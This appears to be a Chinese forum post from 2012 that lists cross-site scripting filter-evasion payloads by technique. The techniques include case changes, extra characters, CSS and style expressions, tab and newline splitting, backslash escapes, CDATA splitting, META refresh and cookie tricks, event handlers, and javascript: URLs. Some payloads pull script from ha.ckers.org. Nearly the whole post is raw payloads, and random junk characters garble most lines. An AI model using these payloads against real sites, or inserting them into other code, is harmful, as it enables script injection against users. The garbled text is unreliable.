1. 改变字符大小写
6 F* k1 [; [* Z1 a% t. ?5 H$ W& `( Z% F$ @ z$ N- g
4 C' C0 }3 O% e
3 v# L0 i' T2 a <sCript>alert(‘d’)</scRipT>, N& [% P) a% H |
7 ~" t* a! A, N9 C5 O
2. 利用多加一些其它字符来规避Regular Expression的检查
! c% K' }& I- _. C1 }3 p
! s, q2 I, W c <<script>alert(‘c’)//<</script># E3 O7 Z+ B! N2 ~. u; |) }
/ g3 }/ V/ I. { <SCRIPT a=">" SRC="t.js"></SCRIPT>
/ Y2 A: p o0 a5 S6 h
% \0 F2 H/ ]" g8 Q* [0 |$ a6 b <SCRIPT =">" SRC="t.js"></SCRIPT># W5 T. D3 s) ]; w# A# Y( D% O
& d6 _/ x# |4 Q) I7 o# c <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
9 Y$ s! q, K" r8 {' \3 }
* e% K) H# v# |9 y <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>1 \) J4 i: Q; R; f* R9 B3 I- J
9 A, R( b& S, H' X1 C6 H4 f <SCRIPT a=`>` SRC="t.js"></SCRIPT>
6 U u( k0 `4 S7 f+ o% D, i
) z0 e7 v8 @6 y <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
O# _8 h0 j3 E) z$ B& s" d- p! l
, N1 ]+ |2 s- P' p3. 以其它扩展名取代.js5 ~) P3 }6 r- \4 p' S( t
' i# s* t7 b3 `" k. }5 [' {
<script src="bad.jpg"></script>
# C! Q: }8 K5 J3 g9 m1 } b5 _; t% W( R6 J9 D
4. 将Javascript写在CSS档里7 y7 K6 R* H( }) O' D; a
; R: Q0 o. q+ I, y9 q" B4 E N <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">' \' f) ^4 m* E7 f5 I0 z0 _
, D8 l5 u# p, z! y$ o [, V
example:) p. z( a& C4 K
; P2 O- M. t6 Q+ y3 R body {
+ u1 Q3 M3 k/ E8 w3 T3 v
% V- ~- [( u" T0 M5 z D1 T# n' O background-image: url(‘javascript:alert("XSS");’)* ^' q* v! s9 c4 n# n6 h5 A
& d9 }! K8 a3 p1 D8 N, G: T& L
}1 Z; ?/ o1 Y6 P/ z" x
4 S* r* Y% i' ?. I* s
5. 在script的tag里加入一些其它字符" K* @4 q& x7 E* l! o
' k7 K6 ^6 Q3 M0 q X1 S <SCRIPT/SRC="t.js"></SCRIPT>9 U9 ]+ Y- E7 ^$ f9 E* B9 a2 |) K
/ G/ G" N9 b# k" U
<SCRIPT/anyword SRC="t.js"></SCRIPT>
# r9 G( c4 X& m6 A
3 ?' {) _* W/ N( Z8 C7 R6. 使用tab或是new line来规避
5 U8 F3 S3 L: Z; j$ t3 T9 A# e' B9 \' B8 e
<img src="jav ascr ipt:alert(‘XSS3′)">
' V4 t1 H- M* {, d" M
' Y' L9 E( r( G6 ^5 G+ n' o+ L2 v. ] <img src="jav ascr ipt:alert(‘XSS3′)">
9 w& l5 L4 L5 E& u, ?
7 r' Z4 i! Q- L# m# v <IMG SRC="jav ascript:alert(‘XSS’);">
3 d0 p! ?! @5 C o& j3 ^0 s7 U& Z" b9 K3 t& G
-> tag
$ A% Y# Y2 }7 Z! J3 J8 s* w/ `4 E [' |: u o* e9 r/ l
-> new line
- o; G1 E- [9 W+ \- N L2 E
; g1 l1 o3 a: B9 Q ]0 \7. 使用"\"来规避/ S3 a8 I' T# C6 q% f
5 A8 h, X0 c5 ?- q# r
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
/ z/ T+ G' m7 F Q0 w( U2 _& V( c1 e7 J9 H' `
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>. e, i; _$ L' k$ Q; T" s
% h0 b2 l8 ~ q9 ~/ z
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">1 K% ]7 S5 `4 w9 m+ n1 i
9 J, `- ^6 q$ z. G) o6 s
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
' [& \$ F4 g# R) W
7 V1 B' I5 G7 c j4 o <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>4 Q8 O c+ v, E$ Q
7 ~' Q" y5 b! t0 f+ m, l- n
8. 使用Hex encode来规避(也可能会把";"拿掉)
* b) O, u# [, M# s1 u7 b9 a& b/ H9 F1 S8 q
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">" u, b5 P% W5 l0 }9 J
# [9 U) M! v. v9 b. W
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">% ?5 p+ l2 e) Z- `; ]7 S
5 o% z+ o2 d/ S1 V
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">! x8 m; T4 v7 y, w% v U
) s0 N: b+ r% C3 A( W
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
$ B) s3 b# @8 {2 P$ p3 p# V* E8 e/ C3 c9 H" A
9. script in HTML tag# x! X9 O1 \ c+ s8 V& x# t
+ e2 _! U) z0 x5 G9 T5 A1 X5 E
<body onload=」alert(‘onload’)」>
. O* N, w% F& D$ ?6 k% m& w+ v0 r7 x0 @5 K; P8 v( A* s/ q9 [
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload9 \1 Q& r. `9 i) s7 ~% ~
9 [$ N( f) v' F
10. 在swf里含有xss的code# g! g8 z, b# r
: ]$ }- ^( A) N. ?( J) O
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
' A8 _4 n. O, s+ \0 O- C1 W u4 G: d
& w0 u( h" J. A) Q11. 利用CDATA将xss的code拆开,再组合起来。
1 c5 f4 T' `2 \; m
8 ~0 p& e7 n4 V8 W/ W- L* U0 Z <XML ID=I><X><C>
( k: X6 D" a( p( l- P6 w2 J5 [
: \! y8 p5 m, f& e# k* [1 s: q, p <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>3 X9 F0 j, K4 J; b1 K, D
; e6 \) M# ], Q' r+ {' a8 | </C></X>. p6 Y+ p B7 H) |/ b
7 ~, o* i3 `5 S4 p4 r </xml>
1 [" ?2 q$ f: y9 H% }' W$ B0 X4 Y- _% F
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
! G r2 N; T7 \7 f2 F" |
$ I8 u, q% T) t6 G( O <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
5 H8 p! }. ?# W) V/ f: T8 l- K3 B7 |1 @' F
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>& Y0 U! ?" r8 ~3 V# W5 ~; G( E, p5 v
4 H, K- K8 o1 s8 c
12. 利用HTML+TIME。
6 V( l2 i3 L: H7 S* v
& v. H8 q- m% B <HTML><BODY>2 j5 [5 l! f/ p; p/ I0 F7 t
6 Q0 m/ t9 o4 g& W9 ~ <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">0 \, h' j' L( a/ C# r
0 t, S2 ]. n' { h <?import namespace="t" implementation="#default#time2">5 ^1 J, u! v r* F2 r' A
* z# B& z4 y. N
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
8 S5 Y$ u) ^8 V( v" C" u4 T. Q$ u& X+ s1 _* {7 K' t4 l
</BODY></HTML>5 ~! O, j- e. h! |6 |9 g- Z! h$ Q
, q5 D9 z( ~8 l v. G. G
13. 透过META写入Cookie。
6 p q- e" Z9 B O3 X" I+ U, L" W/ A1 Q: c9 Q) U; d
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
# @. z* r2 b5 s' p1 {1 w' [" Q
+ h0 G2 `! R( i14. javascript in src , href , url
4 ^0 K3 B; J0 r( ?% p( H, e' H* F4 F, u' X" a
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
" I! H" `. N# R! l/ t9 p9 L& i7 c& G% C
3 V9 L3 D+ J! h$ }+ @ <img src="javascript:alert(‘XSS3′)">
1 O+ W3 e. H; X: S7 k
. r$ T2 _ a/ ?1 P8 {<IMG DYNSRC="javascript:alert(‘XSS20′)">
( F% w3 \9 l# O; m/ ]/ N
9 i" \7 h8 w! A' ^5 o" L <IMG LOWSRC="javascript:alert(‘XSS21′)">, T$ f A4 j" {# `* p& Y
% C' C6 S# z) J9 Z9 n8 q! P+ Q6 f <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
8 m: p7 V' Q6 K- a. x6 [2 \
% D* {; }7 {. e! ~7 O9 n <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
& x) i% a' E% B) D) V. W& Z9 i q/ }: ?* B
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">0 M' {; t3 E0 V2 T4 K( @
/ y) H$ p; E% V' P) g. i- @ <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
( w0 q) X! h7 l8 L- Q3 y3 l) y* P! L! e- k; y
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}* |& m. c2 j7 p+ ~
9 G: W u/ [2 E/ q5 } </STYLE><A CLASS=XSS></A>- l7 q# c3 o: Q7 B/ a% c
8 A1 l" t! W& o( b% h* S& Q
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>8 \ j/ {; H/ k3 X
$ k0 a$ l% s0 c |
发表于 2012-12-31 09:59:28
收藏
支持
反对